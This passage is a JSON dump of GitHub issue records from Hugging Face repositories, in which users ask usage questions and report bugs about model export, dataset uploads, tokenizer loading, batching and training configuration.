"url": "https://github.com/huggingface/chat-ui/issues/888", "state": "closed", "labels": [], "created_at": "2024-02-29T12:44:20Z", "updated_at": "2025-01-01T11:54:48Z", "comments": 1, "user": "lordsoffallen" }, { "repo": "huggingface/text-generation-inference", "number": 1615, "title": "How to use the grammar support feature?", "body": "### Feature request\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?\n\n### Motivation\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?\n\n### Your contribution\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?", "url": "https://github.com/huggingface/text-generation-inference/issues/1615", "state": "closed", "labels": [], "created_at": "2024-02-29T12:35:24Z", "updated_at": "2024-03-04T14:49:39Z", "user": "Stealthwriter" }, { "repo": "huggingface/datasets", "number": 6700, "title": "remove_columns is not in-place but the doc shows it is in-place", "body": "### Describe the bug\r\n\r\nThe doc of `datasets` v2.17.0/v2.17.1 shows that `remove_columns` is in-place. 
[link](https://huggingface.co/docs/datasets/v2.17.1/en/package_reference/main_classes#datasets.DatasetDict.remove_columns)\r\n\r\nIn the text classification example of transformers v4.38.1, the columns are not removed.\r\nhttps://github.com/huggingface/transformers/blob/a0857740c0e6127485c11476650314df3accc2b6/examples/pytorch/text-classification/run_classification.py#L421\r\n\r\n### Steps to reproduce the bug\r\n\r\nhttps://github.com/huggingface/transformers/blob/a0857740c0e6127485c11476650314df3accc2b6/examples/pytorch/text-classification/run_classification.py#L421\r\n\r\n### Expected behavior\r\n\r\nActually remove the columns.\r\n\r\n### Environment info\r\n\r\n1. datasets v2.17.0\r\n2. transformers v4.38.1", "url": "https://github.com/huggingface/datasets/issues/6700", "state": "closed", "labels": [], "created_at": "2024-02-28T12:36:22Z", "updated_at": "2024-04-02T17:15:28Z", "comments": 3, "user": "shelfofclub" }, { "repo": "huggingface/optimum", "number": 1729, "title": "tflite support for gemma ", "body": "### Feature request\n\nAs per the title, are there plans to support gemma in tflite \n\n### Motivation\n\nnecessary format for current work \n\n### Your contribution\n\nno ", "url": "https://github.com/huggingface/optimum/issues/1729", "state": "closed", "labels": [ "feature-request", "tflite", "Stale" ], "created_at": "2024-02-27T17:15:54Z", "updated_at": "2025-01-19T02:04:34Z", "comments": 2, "user": "Kaya-P" }, { "repo": "huggingface/huggingface_hub", "number": 2051, "title": "How edit cache dir and in bad net download how to redownload with last download point", "body": "OSError: Consistency check failed: file should be of size 1215993967 but has size 118991296 (pytorch_model.bin).\r\nWe are sorry for the inconvenience. Please retry download and pass `force_download=True, resume_download=False` as argument.\r\nIf the issue persists, please let us know by opening an issue on https://github.com/huggingface/huggingface_hub.\r\nDownloading pytorch_model.bin: 10%|\u2588\u2588\u2588\u2588\u258c | 119M/1.22G [06:51<1:03:13, 289kB/s]\r\n\r\nHi, I use this on Windows and drive C: does not have enough space; I want to set the download/install cache dir to D:. How do I do this?\r\nAnd because I have a bad network, one big file download errors out every time; how can I download this file (resuming from the last download point) on a bad network?", "url": "https://github.com/huggingface/huggingface_hub/issues/2051", "state": "closed", "labels": [], "created_at": "2024-02-27T14:45:10Z", "updated_at": "2024-02-27T15:59:35Z", "user": "caihua" }, { "repo": "huggingface/candle", "number": 1769, "title": "[Question] How to modify Mistral to enable multiple batches?", "body": "Hello everybody,\r\n\r\nI am attempting to implement multiple batches for the Mistral forward pass. However, the `forward` method takes an argument `seqlen_offset` which seems to be specific to the batch. I have attempted to implement it with a `position_ids` tensor in [this](https://github.com/EricLBuehler/mistral.rs/blob/mistralrunner/mistralrs-core/src/models/mistral.rs) file. \r\nSpecifically, I rewrote the rotary embedding function:\r\n```rust\r\nfn apply_rotary_emb_qkv(\r\n &self,\r\n q: &Tensor,\r\n k: &Tensor,\r\n position_ids: &Tensor,\r\n) -> Result<(Tensor, Tensor)> {\r\n let cos = self.cos.i(position_ids)?;\r\n let sin = self.sin.i(position_ids)?;\r\n\r\n let q_embed = (q.broadcast_mul(&cos)? + rotate_half(q)?.broadcast_mul(&sin))?;\r\n let k_embed = (k.broadcast_mul(&cos)? 
+ rotate_half(k)?.broadcast_mul(&sin))?;\r\n Ok((q_embed, k_embed))\r\n}\r\n```\r\nI create the position ids with the following line:\r\n```rust\r\nlet position_ids = Tensor::arange(\r\n past_key_values_length as i64,\r\n (past_key_values_length + seq_len) as i64,\r\n input_ids.device(),\r\n)?;\r\n```\r\nWith `past_key_values_length` as the result of\r\n```rust\r\nfn calculate_past_kv_len(&self, seq_len: usize) -> Result {\r\n let kv_cache_1 = &self.layers.first().as_ref().unwrap().self_attn.kv_cache;\r\n if kv_cache_1.is_none() {\r\n return Ok(0);\r\n }\r\n let k_cache_1 = &kv_cache_1.as_ref().unwrap().0;\r\n if k_cache_1.dims()[0] <= seq_len {\r\n Ok(0)\r\n } else {\r\n let indexed = k_cache_1.i(seq_len)?;\r\n let dims = indexed.dims();\r\n Ok(dims[dims.len() - 2])\r\n }\r\n}\r\n```\r\nMy implementation attempts to follow the [transformers implementation of calculating position ids](https://github.com/huggingface/transformers/blob/main/src/transformers/models/mistral/modeling_mistral.py#L977-L985) and for the [implementation of `apply_rotary_emb_qkv`](https://github.com/huggingface/transformers/blob/5c341d4555ba3e4b656053317e372ebed0c5af37/src/transformers/models/mistral/modeling_mistral.py#L139-L164). However, when I copy and run the candle-examples inference script, with the only change being that I do not pass the `seqlen_offset` variable, it does not produce coherent output. While the model runs, it does not \"work\".\r\n\r\nHow can I implement multiple-batch forward passes? Is there a way to do it using the `seqlen_offset` variable? Thank you for any help.", "url": "https://github.com/huggingface/candle/issues/1769", "state": "closed", "labels": [], "created_at": "2024-02-27T13:18:18Z", "updated_at": "2024-03-01T14:01:21Z", "user": "EricLBuehler" }, { "repo": "huggingface/datatrove", "number": 108, "title": "How to load a dataset with the output a tokenizer?", "body": "I planned to use datatrove to apply my tokenizer so that data is ready to use with nanotron.\r\nI am using DocumentTokenizer[Merger] which produces *.ds and *ds.index binary files, although, from what I understood, nanotron is expecting datasets (with \"input_ids\" keys).\r\nI see that things like ParquetWriter cannot be piped after DocumentTokenizer.\r\n\r\nAm I missing a piece?\r\nAre there some helpers to convert ds files into parquet files (or something loadable with datasets) for a given context size?", "url": "https://github.com/huggingface/datatrove/issues/108", "state": "closed", "labels": [], "created_at": "2024-02-27T08:58:09Z", "updated_at": "2024-05-07T12:33:47Z", "user": "Jeronymous" }, { "repo": "huggingface/chat-ui", "number": 875, "title": "Difficulty configuring multiple instances of the same model with distinct parameters", "body": "I am currently self-deploying an application that requires setting up multiple instances of the same model, each configured with different parameters. For example:\r\n\r\n```\r\nMODELS=`[{\r\n \"name\": \"gpt-4-0125-preview\",\r\n \"displayName\": \"GPT 4\",\r\n \"endpoints\" : [{\r\n \"type\": \"openai\"\r\n }]\r\n},\r\n{\r\n \"name\": \"gpt-4-0125-preview\",\r\n \"displayName\": \"GPT 4 temp 0\",\r\n \"parameters\": {\r\n \"temperature\": 0.0\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\"\r\n }]\r\n}\r\n]`\r\n```\r\n\r\nThis results in a state which looks like that both models are active simultaneously. 
\r\n![image](https://github.com/huggingface/chat-ui/assets/99467346/0ed9d506-d413-45b5-b959-92e872875748)\r\n\r\nHowever, in practice, I cannot activate the second model (\"GPT 4 temp 0\"); only \"GPT 4\" is utilized during chat operations. It appears as if the system defaults to the first model instance and ignores subsequent ones with the same model name.\r\n\r\nI tried to distinguish between the models by modifying the `name` field and introducing an `id` field, using the appropriate model identifier. However, this approach resulted in a loss of model reference, indicating that these fields cannot be arbitrarily configured on the client side.\r\n\r\nIs there a recommended approach to deploying two instances of the same model with varying parameters? Any guidance or suggestions on how to achieve this would be greatly appreciated.\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/875", "state": "open", "labels": [], "created_at": "2024-02-26T10:48:43Z", "updated_at": "2024-02-27T17:28:21Z", "comments": 1, "user": "mmtpo" }, { "repo": "huggingface/optimum-nvidia", "number": 76, "title": "How to install optimum-nvidia properly without building a docker image", "body": "It's quite hard for me to build a docker image, so I started from a docker environment with TensorRT LLM 0.6.1 inside.\r\n\r\nI checked your dockerfile, followed the process, and built TensorRT LLM using (I am using 4090 so that cuda arch is 89):\r\n\r\n```\r\npython3 scripts/build_wheel.py -j --trt_root /usr/local/tensorrt --python_bindings --cuda_architectures=\"89-real\" --clean\r\n```\r\n\r\nAfterwards, I copied the resulting bindings*.so into tensorrt_llm's directory inside the dist-packages dir -- according to the dockerfile. Then I followed it to install nvidia-ammo 0.3, then added the optimum-nvidia dir to python path.\r\n\r\nI also went into optimum-nvidia directory, and ran `pip install -e .`, so that in my environment, when using `pip list | grep optimum` I could get:\r\n\r\n```\r\noptimum 1.17.1\r\noptimum-nvidia 0.1.0b2 /root/autodl-tmp/optimum-nvidia\r\n```\r\nHowever, I still could not import optimum.nvidia properly, while it's okay to `import tensorrt_llm` and `tensorrt_llm.bindings`.\r\n\r\n```\r\n>>> from optimum.nvidia.pipelines import pipeline\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\nModuleNotFoundError: No module named 'optimum.nvidia'\r\n>>> \r\n```\r\n\r\nCould someone please help me on how to install optimum nvidia properly without building a new image or pulling from dockerhub?\r\n\r\nThank you!", "url": "https://github.com/huggingface/optimum-nvidia/issues/76", "state": "closed", "labels": [], "created_at": "2024-02-26T05:05:24Z", "updated_at": "2024-03-11T13:36:18Z", "user": "Yuchen-Cao" }, { "repo": "huggingface/diffusers", "number": 7088, "title": "Vague error: `ValueError: With local_files_only set to False, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.` how to fix?", "body": "Trying to convert a .safetensors stable diffusion model to whatever the format is that hugging face requires. 
It throws a vague non sequitur of an error:\r\n\r\n`pipe = diffusers.StableDiffusionPipeline.from_single_file(str(aPathlibPath/\"vodkaByFollowfoxAI_v40.safetensors\") )`\r\n\r\n```...\r\n [1241](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1241) )\r\n [1242](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1242) else:\r\n [1243](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1243) return {\"text_encoder\": text_encoder, \"tokenizer\": tokenizer}\r\n\r\nValueError: With local_files_only set to False, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.\r\n```\r\n\r\nWhat tokenizer? What path? Where would I get this file? This script already downloaded something locally, why not download this extra thing as well instead of throwing an error?\r\n\r\nWhen I pass local_files_only=True, it says the SAME thing:\r\n`ValueError: With local_files_only set to True, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.`", "url": "https://github.com/huggingface/diffusers/issues/7088", "state": "closed", "labels": [ "stale", "single_file" ], "created_at": "2024-02-25T15:03:07Z", "updated_at": "2024-09-17T21:56:26Z", "user": "openSourcerer9000" }, { "repo": "huggingface/diffusers", "number": 7085, "title": "how to train controlnet with lora?", "body": "Training the full controlnet needs a lot of resources and time, so how can I train controlnet with lora?\r\n", "url": "https://github.com/huggingface/diffusers/issues/7085", "state": "closed", "labels": [ "should-move-to-discussion" ], "created_at": "2024-02-25T06:31:47Z", "updated_at": "2024-03-03T06:38:35Z", "user": "akk-123" }, { "repo": "huggingface/optimum-benchmark", "number": 138, "title": "How to set trt llm backend parameters", "body": "I am trying to run the trt_llama example: https://github.com/huggingface/optimum-benchmark/blob/main/examples/trt_llama.yaml\r\n\r\nIt seems optimum-benchmark will automatically transform the huggingface model into an inference engine file and then benchmark its performance. When we use tensorrt llm, there is a model \"build\" process (during which we set some quantization parameters) in order to get the `.engine` file. How can we set these parameters when using optimum benchmark?", "url": "https://github.com/huggingface/optimum-benchmark/issues/138", "state": "closed", "labels": [], "created_at": "2024-02-24T17:12:12Z", "updated_at": "2024-02-27T12:48:44Z", "user": "Yuchen-Cao" }, { "repo": "huggingface/optimum-nvidia", "number": 75, "title": "How to build this environment without docker?", "body": "My computer does not support the use of docker. How do I deploy this environment on my computer?", "url": "https://github.com/huggingface/optimum-nvidia/issues/75", "state": "open", "labels": [], "created_at": "2024-02-24T16:59:37Z", "updated_at": "2024-03-06T13:45:18Z", "user": "lemon-little" }, { "repo": "huggingface/accelerate", "number": 2485, "title": "How to log information into a local logging file?", "body": "### System Info\n\n```Shell\nHi, I want to save a copy of logs to a local file, how to achieve this? 
Specifically, I want accelerator.log also write information in my local file.\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHi, I want to save a copy of logs to a local file, how to achieve this? Specifically, I want accelerator.log also write information in my local file.\n\n### Expected behavior\n\nHi, I want to save a copy of logs to a local file, how to achieve this? Specifically, I want accelerator.log also write information in my local file.", "url": "https://github.com/huggingface/accelerate/issues/2485", "state": "closed", "labels": [], "created_at": "2024-02-24T07:52:55Z", "updated_at": "2024-04-03T15:06:24Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/optimum-benchmark", "number": 136, "title": "\uff08question\uff09When I use the memory tracking feature on the GPU, I find that my VRAM is reported as 0. Is this normal, and what might be causing it?", "body": "![1](https://github.com/huggingface/optimum-benchmark/assets/89191003/4c1adfad-007b-4ef4-99ff-a43fa0101c00)\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/136", "state": "closed", "labels": [], "created_at": "2024-02-24T02:57:49Z", "updated_at": "2024-03-08T16:59:41Z", "user": "WCSY-YG" }, { "repo": "huggingface/optimum", "number": 1716, "title": "Optimum for Jetson Orin Nano", "body": "### System Info\n\n```shell\noptimum version: 1.17.1\r\nplatform: Jetson Orin Nano, Jetpack 6.0\r\nPython: 3.10.13\r\nCUDA: 12.2\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\n\r\n Here is how I installed.\r\n1. install Pytorch 2.2.0 following https://elinux.org/Jetson_Zoo\r\n2. install onnxruntime-gpu 1.17.0 following following https://elinux.org/Jetson_Zoo\r\n3. 
install Optimum by using `pip install optimum[onnxruntime-gpu]`\n\n### Expected behavior\n\nThe Optimum installed on my Jetson Orin Nano not support GPU for Jetpack 6.0 and Python 3.10.13.\r\n\r\nCan anybody let me know how to install it?", "url": "https://github.com/huggingface/optimum/issues/1716", "state": "open", "labels": [ "bug" ], "created_at": "2024-02-23T23:22:08Z", "updated_at": "2024-02-26T10:03:59Z", "comments": 1, "user": "JunyiYe" }, { "repo": "huggingface/transformers", "number": 29244, "title": "Google Gemma don't know what 1+1 is equal to\uff1f", "body": "### System Info\r\n\r\n[v4.38.1](https://github.com/huggingface/transformers/releases/tag/v4.38.1)\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n```\r\n\r\nimport torch\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"./gemma_2B\")\r\nmodel = AutoModelForCausalLM.from_pretrained(\"./gemma_2B\", device_map=\"auto\", torch_dtype=torch.float32)\r\n\r\ninput_text = \"1+1=\uff1f\"\r\ninput_ids = tokenizer(input_text, return_tensors=\"pt\").to(\"cuda\")\r\n\r\noutputs = model.generate(**input_ids,max_length=50)\r\n# print(outputs)\r\nprint(tokenizer.decode(outputs[0]))\r\n\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\noutput is bellow\r\n\r\n```\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1\r\n```", "url": "https://github.com/huggingface/transformers/issues/29244", "state": "closed", "labels": [], "created_at": "2024-02-23T12:16:17Z", "updated_at": "2024-03-07T10:54:09Z", "user": "zhaoyun0071" }, { "repo": "huggingface/optimum", "number": 1713, "title": "Issue converting owlv2 model to ONNX format", "body": "Hi Team,\r\n\r\nI hope this message finds you well.\r\n\r\nI've been working with the owlv2 model and have encountered an issue while attempting to convert it into ONNX format using the provided command:\r\n`! optimum-cli export onnx -m google/owlv2-base-patch16 --task 'zero-shot-object-detection' --framework 'pt' owlv2_onnx`\r\n\r\nUnfortunately, I'm facing the following error:\r\n\r\n`ValueError: Trying to export a owlv2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`.`\r\n\r\nAs I am relatively new to this process, I'm unsure about the necessity and usage of custom ONNX configuration. Could you please provide some guidance on how to address this issue? 
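\r\n\r\nIn case it helps, this is the small check I ran to see whether my installed optimum recognizes the architecture at all (a sketch; the TasksManager API is my assumption from reading the optimum source and may differ between versions):\r\n\r\n```python\r\nfrom optimum.exporters.tasks import TasksManager\r\n\r\n# assumption: this raises (or returns nothing) when \"owlv2\" has no native ONNX support\r\nprint(TasksManager.get_supported_tasks_for_model_type(\"owlv2\", exporter=\"onnx\"))\r\n```\r\n\r\n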
Any assistance or insights would be greatly appreciated.\r\n\r\nThank you for your attention to this matter.", "url": "https://github.com/huggingface/optimum/issues/1713", "state": "closed", "labels": [ "feature-request", "onnx", "exporters" ], "created_at": "2024-02-23T05:55:23Z", "updated_at": "2025-09-10T23:26:13Z", "comments": 6, "user": "n9s8a" }, { "repo": "huggingface/optimum-benchmark", "number": 135, "title": "How to import and use the quantized model with AutoGPTQ\uff1f", "body": "", "url": "https://github.com/huggingface/optimum-benchmark/issues/135", "state": "closed", "labels": [], "created_at": "2024-02-23T03:13:28Z", "updated_at": "2024-02-23T05:03:06Z", "user": "jhrsya" }, { "repo": "huggingface/optimum", "number": 1710, "title": "Native Support for Gemma", "body": "### System Info\n\n```shell\npython version : 3.10.12\r\noptimum version : built from github\r\nopenvino : 2024.1.0-14548-688c71ce0ed\r\ntransformers : 4.38.1\n```\n\n\n### Who can help?\n\n@JingyaHuang @echarlaix \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nCurrently there is no support to export gemma, google's new opensource model. \r\n\r\nAfter connecting to huggingface and requesting permission to access the gemma repo\r\n\r\nrunning the following line \r\n`model_ov = OVModelForCausalLM.from_pretrained(\"google/gemma-2b\", export = True)`\r\n\r\nproduces the following error\r\n`\r\nValueError: Trying to export a gemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type gemma to be supported natively in the ONNX export.`\r\n\n\n### Expected behavior\n\nExpected behavior is for the line of code to successfully run and such that we can export the IR format of the model as well.", "url": "https://github.com/huggingface/optimum/issues/1710", "state": "closed", "labels": [ "feature-request", "onnx", "exporters" ], "created_at": "2024-02-22T17:15:08Z", "updated_at": "2024-02-28T08:37:36Z", "comments": 5, "user": "Kaya-P" }, { "repo": "huggingface/sentence-transformers", "number": 2499, "title": "how can i save fine_tuned cross-encoder to HF and then download it from HF", "body": "I'm looking for ways to share fine-tuned cross-encoder with my teacher. \r\nCross encoder model does not have native push_to_hub() method. So i decided to use general approach:\r\n\r\n```\r\nfrom transformers import AutoModelForSequenceClassification\r\nimport torch\r\n\r\n# read from disk, model was saved as ft_model.save(\"model/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\ncross_ft_model = AutoModelForSequenceClassification.from_pretrained(\"model\\\\crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n# push to hub\r\ncross_ft_model.push_to_hub(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n```\r\n\r\nNow model is available on HF. 
Commit info was like:\r\nCommitInfo(commit_url='https://huggingface.co/satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2/commit/d81fe317cb037940e09db256d8a0926e80c358e5', commit_message='Upload BertForSequenceClassification', commit_description='', oid='d81fe317cb037940e09db256d8a0926e80c358e5', pr_url=None, pr_revision=None, pr_num=None)\r\n\r\nthen i decided to ensure the model is workable:\r\n\r\n```\r\ncross_ft_model = CrossEncoder(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\ncross_ft_model.predict([('SentenceTransformer is well-documented library','but saving crossencoder to HF is a bit tricky')])\r\n```\r\n\r\nand get the error:\r\n\r\n_Traceback (most recent call last):\r\n\r\n Cell In[18], line 1\r\n cross_ft_model = CrossEncoder(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\sentence_transformers\\cross_encoder\\CrossEncoder.py:72 in __init__\r\n self.tokenizer = AutoTokenizer.from_pretrained(model_name, **tokenizer_args)\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\transformers\\models\\auto\\tokenization_auto.py:745 in from_pretrained\r\n return tokenizer_class_fast.from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs)\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\transformers\\tokenization_utils_base.py:1838 in from_pretrained\r\n raise EnvironmentError(\r\n\r\nOSError: Can't load tokenizer for 'satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2'. If you were trying to load it from 'https://huggingface.co/models', make sure you don't have a local directory with the same name. Otherwise, make sure 'satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2' is the correct path to a directory containing all relevant files for a BertTokenizerFast tokenizer._\r\n\r\n\r\nI compare local model folder and uploaded HF model files, last ones don't include tokenizer files. Uploaded model don't work on HF too. How can i correctly upload model with tokenizer to HF and the use it from HF like model = CrossEncoder(path_to_hf)?\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2499", "state": "closed", "labels": [ "good first issue" ], "created_at": "2024-02-22T15:29:37Z", "updated_at": "2025-03-25T16:07:25Z", "user": "satyrmipt" }, { "repo": "huggingface/transformers", "number": 29214, "title": "How to get input embeddings from PatchTST with (batch_size, sequence_length, hidden_size) dimensions", "body": "### System Info\n\n-\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe following snippet outputs the last hidden state but it has (batch_size, num_channels, num_patches, d_model) dimensions\r\n`inputs = encoder(\r\n past_values=series_list, output_hidden_states=True\r\n ).last_hidden_state`\r\n\r\nHere, series_list has (batch_size, sequence_length, num_input_channels) shape.\r\n\r\nTo incorporate this with [EncoderDecoderModel](https://huggingface.co/docs/transformers/v4.37.2/en/model_doc/encoder-decoder#transformers.EncoderDecoderModel), I want the dimensions of the input embedding to be (batch_size, sequence_length, hidden_size). 
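\r\n\r\nThe only workaround I could come up with is folding the channel axis into the feature axis (a sketch with dummy shapes; I am not sure this mapping is semantically valid, and num_patches is not the same as sequence_length):\r\n\r\n```python\r\nimport torch\r\n\r\n# last_hidden_state: (batch_size, num_channels, num_patches, d_model)\r\nh = torch.randn(8, 7, 32, 128)\r\nb, c, p, d = h.shape\r\n\r\n# fold channels into the feature dim -> (batch_size, num_patches, num_channels * d_model)\r\nh = h.permute(0, 2, 1, 3).reshape(b, p, c * d)\r\nprint(h.shape)  # torch.Size([8, 32, 896])\r\n```\r\n\r\n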
How do you get that?\r\n\n\n### Expected behavior\n\n-", "url": "https://github.com/huggingface/transformers/issues/29214", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-02-22T14:17:10Z", "updated_at": "2024-03-25T03:56:58Z", "user": "nikhilajoshy" }, { "repo": "huggingface/huggingface_hub", "number": 2039, "title": "How to find out the type of files in the repository", "body": "Hello\r\nIs there an option to determine the type of file in the repository, such as \"Checkpoint\", \"LORA\", \"Textual_Inversion\", etc?\r\n\r\nI didn't know where to ask the question so sorry if I'm wrong.", "url": "https://github.com/huggingface/huggingface_hub/issues/2039", "state": "closed", "labels": [], "created_at": "2024-02-22T01:41:29Z", "updated_at": "2024-03-25T11:39:31Z", "user": "suzukimain" }, { "repo": "huggingface/datasets", "number": 6686, "title": "Question: Is there any way for uploading a large image dataset?", "body": "I am uploading an image dataset like this:\r\n```\r\ndataset = load_dataset(\r\n \"json\",\r\n data_files={\"train\": \"data/custom_dataset/train.json\", \"validation\": \"data/custom_dataset/val.json\"},\r\n)\r\ndataset = dataset.cast_column(\"images\", Sequence(Image()))\r\ndataset.push_to_hub(\"StanfordAIMI/custom_dataset\", max_shard_size=\"1GB\")\r\n```\r\nwhere it takes a long time in the `Map` process. Do you think I can use multi-processing to map all the image data to the memory first? For the `Map()` function, I can set `num_proc`. But for `push_to_hub` and `cast_column`, I can not find it.\r\n\r\nThanks in advance!\r\n\r\nBest,", "url": "https://github.com/huggingface/datasets/issues/6686", "state": "open", "labels": [], "created_at": "2024-02-21T22:07:21Z", "updated_at": "2024-05-02T03:44:59Z", "comments": 1, "user": "zhjohnchan" }, { "repo": "huggingface/accelerate", "number": 2474, "title": "how to turn off fp16 auto_cast?", "body": "i notice that the deepspeed config always set my `auto_cast=True` and this is my data\r\n``` \r\ncompute_environment: LOCAL_MACHINE\r\ndeepspeed_config:\r\n deepspeed_multinode_launcher: standard\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: cpu\r\n offload_param_device: cpu\r\n zero3_offload_param_pin_memory: true\r\n zero3_offload_optimizer_pin_memory: true\r\n zero3_init_flag: true\r\n zero3_save_16bit_model: true\r\n zero_stage: 3\r\n max_live_parameters: 1e9\r\n max_reuse_distance: 1e9\r\n round_robin_gradients: true\r\n deepspeed_hostfile: /opt/tiger/hostfile\r\ndistributed_type: DEEPSPEED\r\nfsdp_config: {}\r\nmain_training_function: main\r\nmixed_precision: fp16\r\nuse_cpu: false\r\n\r\n```\r\n\r\n\r\nthis is my deepspeed log:\r\n``` \r\n[2024-02-21 19:35:40,143] [INFO] [config.py:958:print_user_config] json = {\r\n \"train_batch_size\": 512, \r\n \"train_micro_batch_size_per_gpu\": 64, \r\n \"gradient_accumulation_steps\": 1, \r\n \"zero_optimization\": {\r\n \"stage\": 3, \r\n \"offload_optimizer\": {\r\n \"device\": \"cpu\", \r\n \"nvme_path\": null\r\n }, \r\n \"offload_param\": {\r\n \"device\": \"cpu\", \r\n \"nvme_path\": null\r\n }, \r\n \"stage3_gather_16bit_weights_on_model_save\": true\r\n }, \r\n \"gradient_clipping\": 1.0, \r\n \"steps_per_print\": inf, \r\n \"fp16\": {\r\n \"enabled\": true, \r\n \"auto_cast\": true\r\n }, \r\n \"bf16\": {\r\n \"enabled\": false\r\n }, \r\n \"zero_allow_untested_optimizer\": true\r\n}\r\n```", "url": "https://github.com/huggingface/accelerate/issues/2474", "state": "closed", "labels": [], "created_at": "2024-02-21T11:54:51Z", "updated_at": 
"2025-02-18T08:53:20Z", "user": "haorannlp" }, { "repo": "huggingface/chat-ui", "number": 852, "title": "what is the difference between \"chat-ui-db\" docker image and \"chat-ui\" docker image?", "body": "I found there are 2 packages in the chat-ui repository: one is chat-ui and the other is chat-ui-db. what is the difference between \"chat-ui-db\" docker image and \"chat-ui\" docker image?\r\n\r\nI've pulled two images from the mirror site: huggingface/text-generation-inference:1.4 and mongo:latest. \r\n\r\nI hope to use the two images( huggingface/text-generation-inference:1.4 and mongo:latest.) and the image of chat-ui or chat-ui-db to implement the local large model Q&A service. What should I do? Should I use \"chat-ui-db\" docker image or Should I use \"chat-ui\" docker image.\r\n\r\nWhat should i do to complete my task of local large model Q&A service? Can anyone give detailed help?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/852", "state": "closed", "labels": [], "created_at": "2024-02-21T09:31:07Z", "updated_at": "2024-02-23T02:58:03Z", "user": "majestichou" }, { "repo": "huggingface/instruction-tuned-sd", "number": 22, "title": "How to use a custom image for validation ", "body": "Hello,\r\nI tried using a custom image for validation since I'm training it on a custom style i uploaded my val image on hub as the mountain.png but it always gives me error for unidentified also for mountain.png it shows validation summary on wandb but for my val image it shows nothing.\r\nDo i need to change something somewhere also how does it compare the val images for loss do i need to put the style image of original image somewhere ", "url": "https://github.com/huggingface/instruction-tuned-sd/issues/22", "state": "closed", "labels": [], "created_at": "2024-02-21T08:15:30Z", "updated_at": "2024-02-22T05:49:11Z", "user": "roshan2024nar" }, { "repo": "huggingface/gsplat.js", "number": 67, "title": "How to set the background color of the scene", "body": "Hi\uff1a\r\nWant to know how to set the background color of the scene,now it's black", "url": 